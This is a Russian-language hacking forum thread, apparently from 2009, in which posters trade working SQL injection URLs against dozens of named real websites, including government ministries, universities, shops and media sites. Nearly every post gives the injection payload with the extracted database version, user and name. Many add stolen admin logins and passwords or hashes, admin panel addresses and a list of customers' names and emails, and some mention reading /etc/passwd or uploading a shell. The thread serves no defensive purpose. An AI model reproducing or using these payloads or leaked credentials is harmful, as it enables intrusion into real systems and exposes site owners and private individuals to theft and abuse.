вот так - с запросом, чтобы не писали, в репу, что мол не скуля там. Скуля-скуля, ка и описал выше - блинд
KosoyRoman
21.04.2009, 06:38
http://top.zenon.net/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.biz.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.cooking.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.travel.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.magelan.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.anekdot.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://www.toptop.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.lgg.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.auto.ru/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
http://top.rosmebel.com/index.phtml?group=-1+union+select+1,2,3,4,5,6,7,8
PostgreSQL 8.1.3 on i386-portbld-freebsd5.4, compiled by GCC cc (GCC) 3.4.2 [FreeBSD] 20040728
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,tabl e_name,null,null+FROM+INFORMATION_SCHEMA.TABLES--#2618
http://www.mediat.com.ua/ann.php?type=9999+union+select+null,null,null,usen ame,passwd,null+FROM+pg_user--#2618
Alexa Rank:31,715
http://squakenet.com/computer_games/download.asp?game=-4869+union+select+version(),2,3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/*&title=Bundesliga-Manager-Professional
Version: 4.0.20a-nt
User: squakenet@localhost
Dbname: squakenet
<<Большая Экономическая библиотека>>
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+concat_ws(0x2a3a2a,version(),data base(),user(),@@version_compile_os),2,3,4,5,6,7,8, 9,0,1,2,3,4--+
5.0.27*:*economics*:*usmdi@localhost*:*redhat-linux-gnu
table: xmb_members
db: corporation
log: Admin
pass: 86b7c7f6dd33661e19a89cf6b1253197 ):
+limit+x,x--+
tables where: like+'password'--+
http://www.economics.com.ua/lib/detail.php?cat=1&rub=3&id=-420+union+select+table_name,2,3,4,5,6,7,8,9,0,1,2, 3,4+from+information_schema.columns+where+column_n ame+like+'password'+limit+0,1--+
http://www.wanderlust.co.uk/event.php?event_id=341+and+1=0+union+select+1,conc at_ws(0x3a,admin_username,admin_password,admin_ema il),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+admin_users--
DB Version: 5.0.27-log
DB Name: wanderlustlive
DB User: wanderlustlive@localhost
Admin data: ellion:zak2bRaP:danny.callaghan@wanderlust.co.uk
PR: 6
http://www.fnv.is/index.php?pid=69&cid=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),user(),database()),.8,9,10,11,12,13,14--
DB Version: 4.0.20a-nt
DB Name: fnv
DB User: smali@localhost
PR: 6
http://www.michaelstewart.co.uk/index.php?page_id=brand&brandid=-1+union+select+1,concat_ws(0x3a,username,password) ,3,4,5,6,7,8,9,10,11,12+from+STAFF+limit+1,1--
DB Version: 5.0.67-community
DB Name: michael_michaelstewart
DB User: michael_kanx197@localhost
Admin data: Admin: DBAdmin / Marco:Monteiro
PR: 6
http://www.runningroom.com/hm/inside.php?id=1+and+1=0+union+select+concat_ws(0x3 a,database(),user(),version()),2--
DB Version: 4.1.22-standard-log
DB Name: rr_main
DB User: rrweb_user@runningroomcanada.com
PR: 6
http://web-well.ru/ptype?view=-3+union+select+1,2--
Version: 5.0.22
Тиц 20
http://www.rs.kljb.de/display.php?idcnt=58&idver=-155+union+select+1,2,3/*
Database Version: 4.1.24
Database name: usrdb_kljduqls
User name: kljduqls@localhost
<<"Дарья Данцова"Официальный сайт>>
http://www.dontsova.ru/view_press.php?id=-38'+union+select+1,2,3,4,5,concat_ws(0x2a3a2a,vers ion(),database(),user(),@@version_compile_os),7,8, 9,0,1,2,3--+
4.0.21-standard-log*:*www_dontsova_ru*:*dontsova_ru_db@192.168.0.1 *:*unknown-linux
http://www.dontsova.ru/site_admin
-------------------------------------------
-=\|sql-blind|/=-
<<студия Интернет рекламы>>
http://12kb.ru/one_article.php?id=99999+and+ascii(substring(versi on(),1,1))=53--+
http://12kb.ru/admin/
Скуля на http://www.eu-integration.gov.ge
Список таблиц.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(table_name+as+ binary)+from+information_schema.tables+--+
Поля таблицы user.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,cast(column_name+as +binary)+from+information_schema.columns+where+tab le_name=0x75736572+--+
Список пользователей-паролей.
http://www.eu-integration.gov.ge/eng/viewnews.php?id=-32+union+select+NULL,NULL,NULL,concat_ws(0x3a,cast (username+as+binary),cast(password+as+binary))+fro m+user+--+
Версия БД: 5.0.77
Ось: portbld-freebsd6.3
Имя БД: euinteg_euinteg
Рабочая папка БД: /var/db/mysql/
Пользователь БД: euinteg_euint@localhost
Прав на чтения файлов нет, доступа к mysql.user нет.
Театральные новые известия(pr6)
http://teatr.newizv.ru/news/?IDNews=-1+union+select+1,database(),table_name,4,5,6,7,8,9 ,11,12--&date=2008-07-01
user() - u10605@10.10.12.75
database() - u10605
version() - 5.0.45-log
База данных одна с главным доменом newizv.ru (тиц-12к pr-7)
Интересные таблы
ReklamaUsers
rgn_users
users
users_
prupal_access
еще есть форум и должна быть неплохая база подписчиков ;)
math.ecnu.edu.cn pr 6
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,2,concat_ws(0x3a,version() ,database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4--
5.0.45:faculty:root@localhost
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,file_priv,concat(user,0x3a ,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 ,4%20from%20mysql.user--
root:07ffadcc61d6408b file_priv - Y
lalala23
22.04.2009, 11:32
http://www.konsalting.tv/content.php?r=-29+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3%20--
4.0.26-log:Uwww3947S@localhost:udb3947
http://www.antgroup.kz/eng/index.php?p=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,6,7%20--
4.1.25:antbase_eng:antbase@localhost
Скуля на www.relaytoday.com
Уязвимый скрипт(9 полей)
http://www.relaytoday.com/admin/previewnewsletter.php?ID=2
Список всех таблиц базы данных.
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables+--+
Список полей таблицы users
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=0x757365 7273+--+
Логин/пароль
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,concat_ws(0x3a,username,passwor d,admin),4,5,6,7,8,9+from+users+--+
Сводка по системе
Версия БД: 5.0.67-log
пользователь: wkhorse_1@localhost
Имя базы данных: wkhorse_relaytoday
ОС: apple-darwin9.0
Папка мускула: /var/mysql/
Админка
http://www.relaytoday.com/admin/
Доступа к mysql.user нет. Прав на чтение файла нет.
<<Антивирусная школа - Новый источник IT знаний>> (:
http://av-school.ru/index.php?dn=blogs&to=comment&id=9999'+Union+sElecT+concat_ws(0x2a3a2a,%27%22%3E %3Ch1%3E%27,version(),database(),user(),@@version_ compile_os)--+&mp
*:*5.1.11-beta*:*kav_system*:*kavsystem@localhost*:*portbld-freebsd6.2"
--------
Powered By Danneo RCMS
http://www.silumin.kz/index.php?m=-259+union+select+1,2,3,version(),5,6,7,8--
http://www.football-plus.az/view_cat.php?cat=2'+and+substring(version(),1,1)=4--+
www.impact.org
http://www.impact.org/speakerprofile.php?id=-76+union+select+1,2,3,4,5,6,7,8--
version():5.0.67-community
user():impact_site@localhost
database():impact_devsite
http://www.dndrocketry.us/pages.php?id=6/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*
Database Version: 4.1.22-standard
Database name: dndrock_store
User name: dndrock_dnd@localhost
http://www.warrenfarrell.com/pages.php?id=-52/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Database Version: 4.0.25
Database name: warren
User name: warren@localhost
http://www.buenachamba.com/pages.php?id=-20%27+union+select+1,user()/*
Database Version: 5.0.22
Database name: edemodb02
User name: edemouser02@localhost
pass к adminarea
mysql хеш:5f02164e65082b3e
.:[melkiy]:.
23.04.2009, 00:13
http://www.ideaborn.com/detalle.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-userstats-log
Database name: ideaborn_db
User name: ideaborn@ned.dreamhost.com
Login: admin
Pass: 81dc9bdb52d04dc20036dbd8313ed055 : 1234
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,4,5--
Database Version: 4.1.22-log
Database name: jobgoro9_pokebase
User name: jobgoro9_@localhost
email: pass
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,pass,concat_ws(0x3a,email)+fr om+users--
http://www.tvlab.com.ua/news/?id=-1+union+select+1,2,3,4--
Database Version: 5.0.51a
Database name: tvlab
User name: root@localhost
Шоп Багаж
http://bagazh-club.com.ua/index.php?m=06&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.51a-15-log
Database name: bagazhclub
User name: u_bagazhclub@localhost
Админка:
http://bagazh-club.com.ua/admin/
name: email: pswd
test:test@test.com:3213213213
test02:test02@mail.ru:2155456745
Иван Помидоров:ja-in-da-house@yandex.ru:654654654654
Федор Двинятин:test@mail.ru:384188998461
Сапармурат Ниязов:test@intechcentr.net:384188998461
123:ajegulsky@aaa.com:444586395834
Федор Иванов:abc@mail.ru:392703942157
Бла Бла:bla@mail.ru:271963550274
Людмила:mvadim@pisem.net:728109118270
Вадим:mvc@pur.ru:199490154267
Дмитрий:dimitriy_7@mail.ru:532843683176
Павел:arn_k@fromru.com:886098478852
Никита:nik-13-92@mail.ru:660344924172
Алла:allsolla@mail.ru:999999992222
Олег:Lichne@gmail.com:100509603544
алексей:alex_dem2008@mail.ru:335210418217
Инна:tebochka@ukr.net:614732119521
ILYAtirtir
23.04.2009, 04:48
Offshore Banking|NCB Cayman Limited
Microsoft Access
http://ncbcayman.com/services.asp?service=1+union+select+1,2,3,4,5,6,7, 8,9,10,11+from+news
Доступа к MSysObjects как и к другим системным таблицам нету.Стоит админка,но её таблицу юзеров не подобрал.
Какой-то сайт граффити
http://workground.net/news9112008'+and+ascii(substring(user(),1,1))=109+--+.html
ИТД
->user() = master@localhost
http://workground.net/news9112008'+and+ascii(substring((select+1+from+ad min),1,1))=49+--+.html
таблица admin колонки login,pdw
в итоге
admin:enter2work
Админка:http://workground.net/admin/
Скуля на сайте http://www.healthministry.ge
Логин/пароль админа
http://www.healthministry.ge/eng/archive.php?Id=1994&act=full&catId=49+and+0+union+select+1,2,3,4,concat_ws(0x3a ,username,pass),6+from+moh_auth+limit+0,1+--+
Расшифровка логина/пароля:
moh:mohsmi7
Database Version: 5.0.45-Debian_1ubuntu3.3-log
Database name: moh
User name: healthge@localhost
На сайте разрешено индексирование:
http://www.healthministry.ge/eng/
Привилегий на чтение файлов нет. Доступа к mysql.user нет.
.museum =)
http://www.portail.wallonie.museum/en/map.php?id=-126+union+select+1,2,version(),4,5/*
Version: 5.0.45-community
User: aicim@swebdmz1.etnic.be
Dbname: mw
Официальный веб-сайт МГТУ им Н.Э.Баумана
http://bmstu.ru/history_pict.php?newsid='
Version: 5.0.45
User: bmstu_admin@localhost
Name: bmstu
Из интересного:
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+AdminUsers
http://bmstu.ru/history_pict.php?newsid=22+union+select+login,pass +from+wwwuser
Подбор таблиц:
http://bmstu.ru/history_pict.php?newsid=22+union+select+table_name ,table_schema+from+information_schema.tables+limit +39,30
Доступа к mysql.user нет.
mailbrush
23.04.2009, 17:01
Дает XSS
Любая инъекция "дает" ксс, так что не позорься.
http://www.xyxb.cn/chem.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6,7,8,9,10
xueyuan@localhost:xueyuan:5.0.45-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
http://www.grimmauldplace.ru/hb.php?id=1+union+select+1,2,concat_ws(0x3a,user() ,database(),version()),4
u161432@10.10.223.227:u161432:5.0.67-log
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
http://bitlis.meb.gov.tr/hb.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6
f1300_7a2zB3mtwa@10.30.1.66:f1300_7a2zB3mt9L84:4.0 .27-log
+++AndreyDevil+++
23.04.2009, 19:20
http://www.bard.edu/cep/news/release.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Database Version: 4.0.18-standard
Database name: tools_new
User name: tools@masterweb.bard.edu
<<Аудио-Видио клуб>>
http://www.av-club.ru/index.php?id=98+union+select+concat_ws(0x3a,versio n(),database(),user(),@@version_compile_os),2,3,4, 5--+
5.0.45:av:av@localhost:redhat-linux-gnu
http://www.av-club.ru/admin/list.php
table: site_admins
db: arlex
admins:
log: nima
pass: dontworry
Sanyok:6fbaadf9839a3389fb77f38231957e1f
test:123
gali:e10adc3949ba59abbe56e057f20f883e
admin:202cb962ac59075b964b07152d234b70
loadf_file('/etc/passwd')
mailbrush
23.04.2009, 20:07
http://www.mukeshmarwah.net/b.php?id=1+union+select+1,concat_ws(0x3a,user(),da tabase(),version()),3,4,5,6,7
mukesh@172.16.0.141:mm-1967694:5.0.66a-log
www.cormoret.ch
http://www.cormoret.ch/pages/4.php?id=-67+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4--
version():5.0.45-log
user():cormoret@localhost
database():cormoretch
<<Деловая махачкала>>
http://www.05info.ru/subcatalog.php?id=-322)+union+select+1,concat_ws(0x2d3d2a3d2d,version (),database(),user(),@@version_compile_os),3,4,5,6 ,7,8--+
http://www.05info.ru/admin/
Powered by phpBB 2.0.21
4.1.22-log-=*=-www05inforu-=*=-j05info@localhost-=*=-portbld-freebsd6.2
-=admin=-
table: phpbb_users
username: admin
user_password: 112233445566
+limit+x,x--+ - всего 104 узвера....
HAXTA4OK
23.04.2009, 21:18
http://www.firstasset.com/products/fund.php?id= 1'
думаю что тут блинд SQL?
поетому решил через прогу все поискать))))
version():4.0.20
user():fafunds@web1.syonex.com
database():fafunds
спс)))как обычно не ставлю -1)))не знаю почему но бесит)))
Red_Red1
23.04.2009, 21:44
Нет не слепая там скуля. Вывод есть. Скуля самая обычная
-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18/*
HAXTA4OK
23.04.2009, 22:47
http://www.wustyle.com/ch/new/article.php?id=-1+union+select+1,2,concat(database(),0x3a,user(),0 x3a,version()), 4,5,6,7
wustyle_com:wustyle@localhost:4.1.22-standard
M.W.N.N.
23.04.2009, 23:40
Powered by DzCMS
http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5,6,7,8,9,10,11,12,13,14+lim it+1,1/*
version():5.0.33
database():mnvector
user():root@localhost
http://www.monvector.mn/index.php?mcmodule=news&newsid=3+union+select+1,2,3,concat_ws(0x3a,loginna me,password),5,6,7,8,9,10,11,12,13,14+from+user+li mit+1,1/*
admin:dashkaa
http://www.monvector.mn/admin/login.php
___
Powered by DzCMS
http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,versi on(),database(),user()),6,7,8,9,10,11,12,13,14,15+ from+user+limit+1,1/*
version()5.0.33
database():tuushin
user():root@localhost
http://www.tuushin.mn/index.php?do=news&newsid=3+union+select+1,2,3,4,concat_ws(0x3a,login name,password),6,7,8,9,10,11,12,13,14,15+from+user +limit+1,1/*
admin:dashkaa
http://www.tuushin.mn/admin/login.php
___
Powered by DzCMS
http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,vers ion(),database(),user()),6,7,8,9,10,11,12,13,14,15 ,16,17,18,19
version()5.0.75-community-log
database():uurkhaim_uurkhai
user():uurkhaim_admin@localhost
http://www.uurkhai.mn/index.php?mcmodule=news&newsid=72+union+select+1,2,3,4,concat_ws(0x3a,user id,loginname,password),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19+from+user
sony:toshiba
http://www.uurkhai.mn/admin/login.php
___
Powered by DzCMS
http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,version (),database(),user()),4,5,6,7,8,9,10,11,12+limit+1 ,1
version():5.0.75-community-log
database():uukhaine_powergym
user():uukhaine_undes@localhost
http://www.powergym.mn/index.php?mcmodule=news&newsid=588+union+select+1,2,concat_ws(0x3a,loginna me,password),4,5,6,7,8,9,10,11,12+from+user+limit+ 1,1
admin:123456
http://www.powergym.mn/admin/login.php
___
Powered by DzCMS
http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,version( ),database(),user()),4,5,6,7,8,9,10,11,12+from+use r+limit+1,1
version():5.0.75-community-log
database():uukhaine_onlinezar
user():uukhaine_undes@localhost
http://www.onlinezar.mn/index.php?mcmodule=news&newsid=59+union+select+1,2,concat_ws(0x3a,loginnam e,password),4,5,6,7,8,9,10,11,12+from+user+limit+1 ,1
admin:mmc
http://www.onlinezar.mn/admin/login.php
___
Powered by DzCMS
http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,versi on(),database(),user()),5,6,7,8,9,10+limit+1,1/*
version():4.1.20-log
database():uilsmn
user():dbuils@209.62.85.107
http://www.uils.mn/index.php?info=newsfull&newsid=134+union+select+1,2,3,concat_ws(0x3a,login name,password),5,6,7,8,9,10+from+user+limit+1,1/*
d.admin:admin
http://www.uils.mn/admin/login.php
___
Powered by DzCMS
http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,version (),database(),user()),4,5,6,7,8,9,10,11,12+limit+1 ,1/*
version():4.1.20-max-log
database():ecoedu
user():ecouser@67.15.35.121
http://www.ecoedu.mn/index.php?mcmodule=news&newsid=850+union+select+1,2,concat_ws(0x3a,loginna me,password),4,5,6,7,8,9,10,11,12+from+user+limit+ 1,1/*
admin:admin
http://www.ecoedu.mn/admin/login.php
___
Powered by DzCMS
http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,versio n(),database(),user()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18+from+user/*
version():4.1.20-log
database():eiti
user():eitimongolia@67.15.184.2
http://www.mon-ensemble.mn/index.php?mcmodule=cat_pages&catcode=7+union+select+1,2,3,concat_ws(0x3a,loginn ame,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 +from+user/*
admin:admin
http://www.mon-ensemble.mn/admin/login.php
___
http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat_ws(0x3a,versio n(),database(),user())/*
version()():5.0.45
database():sflc_db
user():sflcdbuser@localhost
http://sflc.num.edu.mn/index.php?newsid=zuwlul&contentid=7+union+select+1,2,concat(table_name,0x3 a,column_name)+from+information_schema.columns/*
<<Доска бесплатных объявлений>>
http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,concat_ws(0x2d3d2a 3d2d,version(),database(),user(),@@version_compile _os),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--+
5.0.22-=*=-board_-=*=-admin@localhost-=*=-redhat-linux-gnu
robots.txt
#robots.txt for http://www.board.reporter-studio.ru
user-agent: *
disallow: /admin/
disallow: /connect.php
disallow: /banners.php
Host: www.board.reporter-studio.ru
tables where: +like+'password'--+
http://www.board.reporter-studio.ru/idv.php?id=-55886'+union+select+1,2,3,4,5,6,table_name,8,9,0,1 ,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6+from+information_sc hema.columns++where+column_name+like+0x70617373776 f7264+limit+7,1--+
table: admin
db: publications_
log: admin
pass: 374982
load_file('/etc/passwd')
Скуля на http://www.radio-shalom.ca
Уязвимый скрипт.
http://www.radio-shalom.ca/showemission.php?ID=1015
Список пользователей и их паролей.
http://www.radio-shalom.ca/showemission.php?ID=1015+and+0+union+select+1,2,3, 4,5,6,7,8,9,concat_ws(0x3a,login,pass),11,12,13,14 +from+alex_livre_users_en+limit+0,1+--+
Database Version: 5.0.45
Database name: Main
User name: shalomcanada@treasure.inside.globat.com
Datadir: /data/mysqld1/
OS: redhat-linux-gnu
<<СПРАВОЧНИК БИЗНЕС-ИНФО, КАЗАХСТАН.>>
http://www.1kz.biz/index.php?city=&cat=2&id=-20+union+select+1,2,3,concat_ws(0x2d3d2a3d2d,versi on(),database(),user(),@@version_compile_os),5,6,7 ,8,9,0,1,2,3--+
5.0.67-community-log-=*=-slvn_1kz-=*=-slvn_1kzbiz83@localhost-=*=-redhat-linux-gnu
www.democracymeansyou.com
http://www.democracymeansyou.com/articles/articlepf.php?ID=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19--
version():4.0.18-standard
database():dmy_db1
user():kleinfei@localhost
<<Работа в Киеве>>
http://www.ukrwork.net/pers_rezume.php?id=-3510+union+select+1,concat_ws(0x2d3d2a3d2d,version (),database(),user(),@@version_compile_os),3,4,5,6 ,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--
http://www.ukrwork.net/admin/login.php?accesscheck=%2Fadmin%2Findex.php
В админке моно слить и редоктировать всех пользователей....
5.0.51a-=*=-279_ukrworknet-=*=-adminukrwork_279@localhost-=*=-portbld-freebsd7.0
concat_ws(0x3a,login,pazzword) from users +limit+620,1
-=admin=-
log: admin
pass: qp173y
mailbrush
24.04.2009, 16:04
http://kapelan68.net/k.php?actionn=komentarz&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4kapelan@localhost:kapelan:5.0.45-Debian_1ubuntu3.3-log
5.0.45-Debian_1ubuntu3.3-log
впервые такую версию вижу
http://www.musiklexikon.net/komponisten/k.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24
musiklexikon@localhost:musiklexikon:5.0.45
M.W.N.N.
24.04.2009, 16:59
http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,version(),data base(),user()),3
version():5.0.75-1
database():web22_db1
user():web22_u1@localhost
http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,id,login,pass) ,3+from+moderator
1:Andrey:0025308
2:Tarantul:htlfrnjh
1)
http://lisbon.pessoa.free.fr/places.php?id=-67+union+select+1,2,3,4,5--
version():5.0.67
database():lisbon_pessoa
user():lisbon.pessoa@172.20.245.45
2)
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,2,3,4--
version():5.1.31
database():ciudadredonda
user():ciudadredonda@localhost
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,table_name,3,4+from+information_ schema.tables--
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,concat(0x3a,login,password),3,4+ from+members--
admin312PQ/H/U6AVM
demodevFxxVFZsuos
M.W.N.N.
24.04.2009, 17:29
http://www.uddannelsesnetvaerket.dk/events.php?mode=view&iEventID=228+union+select+1,2,3,concat_ws(0x3a,ver sion(),database(),user()),5,6,7,8,9,10,11+limit+1, 1/*
version():5.0.27
database():uddnet
user():uddnet@localhost
DezMond™
24.04.2009, 18:12
http://www.ccls.org/event.php?d=20090412&eventID=-4662+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,version(),78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99,100,101,102,103,104,105,106,107,108,1 09,110,111,112,113,114,115,116,117,118,119,120,121 ,122,123,124,125,126,127,128,129,130--
4.1.22-standard
.:[melkiy]:.
24.04.2009, 18:59
http://www.nigfilmcorp.com/content.php?id=-7+union+select+1,2,3,4,5--
Database Version: 4.1.22-max-log
Database name: nfcadmin
User name: nfcadmin@64.202.163.150
http://www.everydaydish.tv/index.php?page=recipe&recipe=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.32-Debian_7etch8-log
Database name: everydaydish
User name: root@localhost
FILE_PRIV: Y
Login: root
Pass: *B747F2732BA6BOC2DD69A76241F18DAF52CA3777 (мб ошибся)
Админка:
http://www.everydaydish.tv/admin
http://www.lp33.tv/index.php?page=content&pid=-1+union+select+1,2,3,4--
Database Version: 5.0.51a-community-log
Database name: myawol
User name: myawol@www02.myawol.com
Вытаскивать из members
M.W.N.N.
24.04.2009, 21:24
http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat_w s(0x3a,version(),database(),user()),5,6,7/*
version():5.0.45-log
database():Bangkoksurgery
user():Bangkoksurgery@localhost
http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(u sername,0x3a,user_password),5,6,7+from+phpbb_users/*
admin:21232f297a57a5a743894a0e4a801fc3=admin
http://www.bangkoksurgery.com/thai/webboard/question.php?gid=7312'+union+select+1,2,3,concat(0 x3a,user,0x3a,pass),5,6,7+from+admin_db/*
admin:admin
http://www.hockeydb.com PR=6
http://www.hockeydb.com/ihdb/stats/pdisplay.php?pid=-62240+union+Select+user(),2,3,4/*
Database Version: 5.0.45-log
Database name: slater_slater
User name: slater_r@localhost
есть таблица vb.users
хеши все соленые!
molotovkeyt
25.04.2009, 03:27
cargotrend.co.th
Google PageRank 3
chttp://www.cargotrend.co.th/webboard/question.php?gid=-115 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C6 96E6A626567696E,(SELECT CONCAT(username,0x7873716C696E6A64656C,passwd,0x78 73716C696E6A64656C,update_date) FROM cargotrend_data.useradmin LIMIT 3,1),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9/*
bweagle:a9071fbe0379ea38bd6684c48de6e9f4:2009-03-13 17:28:21
bweagle:flyhigh
http://www.cargotrend.co.th/admin/login.php
Радует статистика по сайту ;)
http://www.cargotrend.co.th/stat/
Шелл можно закинуть ;)
Вдогонку, желающим поковыряться
http://www.greenlandcity.com/webboard/question.php?gid=-107+union+select+1,2,3,4,5,version(),7,8-- PR 1
http://www.job2way.com/webboard/question.php?gid=-394+union+select+1,2,3,4,version(),6,7-- PR 3
http://www.ningfashion.com/webboard/question.php?gid=-214+union+select+1,2,3,4,5,version(),7,8-- PR 1
Везьде 4.1.22-standard
ILYAtirtir
25.04.2009, 06:37
Hoster IVR,Voice,Broadcasting,Phone,Numbers,Call Routing | Ifbyphone
http://www.ifbyphone.com/clickto_getphone.php?click_id=1565+and+substring(v ersion(),1,1)=5
5ая ветка
user() = ibp-prod_user@web1.ifbyphone.com
Ново-Курьинская вода
http://www.voda.ur.ru/main.php?main=news&rand=4376&id=-100108+union+select+1,concat_ws(0x3a,database(),us er(),version()),3
voda:voda@jet.mplik.ru:5.0.41-log
http://www.voda.ur.ru/main.php?main=news&rand=4376&id=-100108+union+select+1,concat_ws(0x3a,login,passwor d),3+from+eco_admin
admin:5d436cf40fad3f2e
админка http://voda.ur.ru/admin.php
Сеть по лечению целюлита и оздоровления организма
http://www.cellulait.ru/conf/index.php?id=3183+and+1=1
5ая ветка
user() = proinfo@localhost
database() = proinfo_cellulait
6koles.ru тИЦ :450
http://6koles.ru/shini_search_result.php?mode=size&season=0&width=30&height=1&radius=13&company=6+UnIoN+select+concat_ws(0x3A,user(),versi on(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17--+&class14=on
user6koles1@localhost:5.0.24-standard:db_user6koles1
HAXTA4OK
25.04.2009, 12:43
продолжим ламать шины
ТИЦ: 400
PR: 4
http://www.koleso.ru/index.php?pageId=-1+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database()),5,6, 7/*
koleso@localhost:5.0.45-log:koleso
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot